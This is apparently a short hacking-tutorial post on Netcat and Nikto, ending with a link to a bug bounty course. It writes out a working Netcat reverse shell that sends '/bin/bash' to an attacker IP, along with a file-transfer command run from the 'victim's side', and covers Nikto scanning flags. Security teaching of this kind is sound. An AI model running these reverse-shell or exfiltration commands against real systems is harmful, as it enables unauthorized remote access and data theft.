🦑 Tool: Netcat - Network Hacking and Administration

Netcat is a versatile networking tool used for reading from and writing to network connections using TCP or UDP, often referred to as the "Swiss Army knife" of networking.

---

### Basic Usage Command:

nc -lvp 4444

Explanation:
- nc: Invokes Netcat.
- -l: Tells Netcat to listen for incoming connections.
- -v: Enables verbose mode for more detailed output.
- -p 4444: Specifies the port (4444) to listen on.

---

### Example: Creating a Reverse Shell (Attacker's Side)

nc -lvp 4444

- Listens on port 4444 for incoming connections from the target machine.

### Example: Reverse Shell (Victim's Side)

nc -e /bin/bash 192.168.1.1 4444

Explanation:
- -e /bin/bash: Executes the Bash shell upon connection.
- 192.168.1.1: Attacker's IP address.
- 4444: Port to connect to on the attacker's machine.

---

### Example: Banner Grabbing

nc -v 192.168.1.1 80

Explanation:
- -v: Enables verbose mode.
- 192.168.1.1: Target IP.
- 80: Common HTTP port. Netcat can be used to grab the banner or response from web servers.

---

### Example: File Transfer
Send a File (Attacker's Side):

nc -lvp 4444 > received_file.txt

Receive a File (Victim's Side):

nc 192.168.1.1 4444 < file_to_send.txt

---

### Important Notes:
1. Netcat can be a powerful tool for legitimate network testing and troubleshooting.
2. Unauthorized use, such as exploiting vulnerabilities or creating backdoors, is illegal. Always ensure you have permission before using Netcat for penetration testing.

🦑 Tool: Nikto - Web Server Scanning

Nikto is a web server scanner that detects security vulnerabilities in web servers, including outdated software, security misconfigurations, and other potential threats.

---

### Basic Usage Command:

nikto -h http://example.com

Explanation:
- nikto: Runs the Nikto tool.
- -h http://example.com: Specifies the target host to scan (http://example.com in this case).

---

### Example: Scanning for Specific Vulnerabilities

nikto -h http://example.com -Tuning 3

Explanation:
- -Tuning 3: Scans for known vulnerabilities (such as file permissions, potential information leaks, etc.).

---

### Example: Output Results to a File

nikto -h http://example.com -o scan_results.txt

Explanation:
- -o scan_results.txt: Saves the scan results to a text file named scan_results.txt.

---

### Example: Scan with Authentication

nikto -h http://example.com -auth "admin:password123"

Explanation:
- -auth "admin:password123": Uses basic HTTP authentication with the provided username and password.

---

### Example: Scan a Specific Port

nikto -h http://example.com -p 8080

Explanation:
- -p 8080: Specifies a custom port (8080) to scan for vulnerabilities.

---

### Important Notes:
1. Nikto is a powerful tool for security researchers and penetration testers.
2. Unauthorized scanning and exploitation of web servers is illegal. Always obtain proper authorization before using Nikto for vulnerability assessments.

14 Hours Bug Bounty Course 2024 Updated

https://youtu.be/TTw-EY7F1rM